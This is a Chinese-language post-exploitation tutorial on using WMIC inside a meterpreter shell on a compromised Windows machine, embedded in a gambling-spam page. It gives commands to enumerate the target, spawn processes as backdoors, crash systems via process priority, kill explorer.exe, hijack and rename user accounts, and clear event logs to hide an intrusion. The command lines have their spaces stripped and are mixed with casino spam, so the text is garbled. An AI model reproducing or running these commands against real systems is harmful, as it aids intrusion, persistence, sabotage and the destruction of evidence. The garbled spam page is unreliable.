">必赢国际437437.com_必赢国际437在线游戏_437必赢国际网站

您现在的位置:必赢国际437437.com_必赢国际437在线游戏_437必赢国际网站 > 专升本辅导 > 大学语文辅导 >  > 正文

那么这条命令将会在目标系统中打开这个窗口

2018-10-05 05:38http://www.baidu.com四川成人高考网

  首先,我们会介绍如何拿到远程PC的meterpreter会话。拿到会话之后,我们还会告诉大家如何提权至管理员权限。

  WMIC命令行可以通过WindowsCMD来访问,直接在meterpretershell中输入“shell“即可。接下来,我们一起看一看WMIC命令以及相应的工作机制。

  下面这个命令可以查看WMIC命令的全局选项,WMIC全局选项可以用来设置WMIC环境的各种属性,通过结合各种全局选项以及参数,我们就可以通过WMIC环境来管理整个系统了。

  铜鼓WMIC命令的操作系统指令,我们可以枚举出大量关于目标系统的信息,包括主机名、域名、制造商以及设备型号等等。

  Roles:它可以给我们提供目标设备在整个网络系统中所扮演的角色,例如工作站、服务器或个人PC等等。必赢国际437437.com

  Manufacturer:它可以给我们提供目标系统的制造商和设备型号,因为某些特定制造商所生产的特定型号设备会存在特定的漏洞,因此我们可以利用这部分信息来寻找存在漏洞的设备。

  UserName:它可以给我们返回系统的用户名,我们可以利用这部分信息来区分谁是管理员谁是普通用户。

  wmiccomputersystemgetName,Domain,Manufacturer,Model,Username,Roles/format:list

  WMIC命令的process选项可以帮助我们在目标用户的系统中创建各种进程。这种功能可以帮助我们创建后门,或占用大量目标系统的内存:

  注意:如果进程创建了一个类似任务管理器和CMD这样的窗口,那么这条命令将会在目标系统中打开这个窗口,这样会引起目标用户的怀疑。

  WMIC命令的process选项还可以帮我们修改目标系统中运行进程的优先级,这是一个非常有用的功能。降低某个进程的优先级可能会导致特定的应用程序发生崩溃,而提升某个进程的优先级甚至还会导致整个系统发生崩溃。

  wmicprocesswherename=”explorer.exe”callsetpriority64

  wmicprocesswherename=”explorer.exe”callterminate

  wmicprocesswhere“NOTExecutablePathLIKE‘%Windows%’”GETExecutablePath

  WMIC命令的fsdir选项可以提取目标系统中文件目录的基本信息,其中包括压缩方法、创建日期、文件大小、是否可读写、是否为系统文件、加密状态以及加密类型等等:

  wmicfsdirwhere=”drive=’c:’andfilename=’test’”get/format:list’

  WMIC命令的datafile选项可以获取目标系统中文件的基本信息,其中包括压缩方法、创建日期、文件大小、是否可读写、是否为系统文件、加密状态以及加密类型等等:

  wmicdatafilewhere=’[PathofFile]’get/format:listwmicdatafilewherename=’c:\\windows\\system32\\demo\\demo.txt’get/format:list

  WMIC可以提取出所有重要系统文件的路径,例如temp目录和win目录等等:

  wmicenvironmentgetDescription,VariableValue

  获取到正在运行的服务列表之后,WMIC还可以提供服务的启动模式,例如“自动”、“手动”和“运行中”:

  wmicservicewhere(state=”running”)getcaption,name,startmode

  wmicsysdrivergetCaption,Name,PathName,ServiceType,State,Status/format:list

  os选项可以列举出目标系统的上一次启动时间、注册的用户数量、处理器数量、物理/虚拟内存信息和安装的操作系统类型等等:

  wmicosgetCurrentTimeZone,FreePhysicalMemory,FreeVirtualMemory,LastBootUpdate,NumberofProcesses,NumberofUsers,Organization,RegisteredUsers,Status/format:list

  wmicbaseboard,getManufacturer,Product,SerialNumber,Version

  wmicmemcachegetName,BlockSize,Purpose,MaxCacheSize,Status

  wmicmemorychipgetPartNumber,SerialNumber

  我们可以根据onboarddevice选项返回的信息来判断目标系统到底是真实的主机操作系统,还是一台虚拟机(VMware或VirtualBox):

  wmiconboarddevicegetDesciption,DeviceType,Enabled,Status/format:list

  wmicuseraccountwherename=’demo’setdisabled=false

  wmicuseraccountwherename=’demo’renamehacker

  wmicuseraccountwherename=’hacker’setpasswordchangeable=false

  WMIC命令的nteventlog选项还可以清除系统的日志记录,当你入侵了某个系统之后,这个命令可以帮助你掩盖攻击痕迹:

  wmicnteventlogwherefilename=[logfilename]’cleareventlogwmicnteventlogwherefilename=’system’cleareventlog